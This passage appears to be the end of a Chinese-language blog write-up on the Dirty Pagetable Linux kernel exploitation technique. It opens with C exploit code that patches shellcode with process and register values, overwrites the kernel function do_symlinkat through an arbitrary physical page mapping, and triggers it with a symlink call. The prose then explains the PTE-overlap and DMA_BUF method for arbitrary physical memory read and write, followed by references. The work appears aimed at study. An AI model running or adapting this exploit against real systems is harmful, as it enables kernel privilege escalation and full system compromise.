    p = memmem(shellcode, sizeof(shellcode), "\x11\x11\x11\x11\x11\x11\x11\x11", 8);
    *(size_t *)p = getpid();
    p = memmem(shellcode, sizeof(shellcode), "\x22\x22\x22\x22\x22\x22\x22\x22", 8);
    *(size_t *)p = (size_t)&win;
    p = memmem(shellcode, sizeof(shellcode), "\x33\x33\x33\x33\x33\x33\x33\x33", 8);
    *(size_t *)p = user_cs;
    p = memmem(shellcode, sizeof(shellcode), "\x44\x44\x44\x44\x44\x44\x44\x44", 8);
    *(size_t *)p = user_rflags;
    p = memmem(shellcode, sizeof(shellcode), "\x55\x55\x55\x55\x55\x55\x55\x55", 8);
    *(size_t *)p = user_sp;
    p = memmem(shellcode, sizeof(shellcode), "\x66\x66\x66\x66\x66\x66\x66\x66", 8);
    *(size_t *)p = user_ss;

    /* write the patched shellcode over do_symlinkat via the arb page */
    memcpy(arb_ptr + (phys_func & 0xfff), shellcode, sizeof(shellcode));
    puts("[+] GO!GO!");

    /* do_symlinkat now runs our shellcode in kernel context */
    printf("%d\n", symlink("/jail/x", "/jail"));

    puts("[-] Failed...");
    close(dev_fd);

    sleep(20);
    return 0;
}

过程图示

之前的描述可能有一些歧义, 这里画图再解释一下流程.

首先喷射并释放file, 使该页面回到BuddySystem.

触发mmap缺页, 分配用户页表和匿名页面. 用户页表占据刚刚的file页面.
dup增加与f_count字段重合的PTE0x1000次, 使得其指向下一个页面, 造成两个PTE重合.
取消其中一个的映射, 即可造成PageUAF.

接下来PageUAF的利用就有很多了.
原文是想再次使用户页表占据该UAF的匿名页面完成任意物理地址读写, 但用户页表来自UNMOVABLE, 匿名页面来自MOVABLE, 所以这是无法实现的.

但DMA分配的匿名页面是来自UNMOVABLE的, 所以这里解除我们可控PTE的映射, 再在同一个虚拟地址映射DMA_BUF, 就可以形成下方左图的情形(要提前分配DMA_BUF, 注意分配和映射的区别). 然后再次dup增加DMA_PTE, 即可使得DMA_PTE指向DMA_BUF下方的页表, 完成任意物理地址读写.

实际上, 该利用方法并没有使用PageUAF.

参考文章

https://ptr-yudai.hatenablog.com/entry/2023/12/08/093606
https://yanglingxi1993.github.io/dirty_pagetable/dirty_pagetable.html

  • 版权声明: 本博客所有文章除特别声明外,著作权归作者所有。转载请注明出处!
  • Copyrights © 2022-2024 翰青HanQi

请我喝杯咖啡吧~

支付宝
微信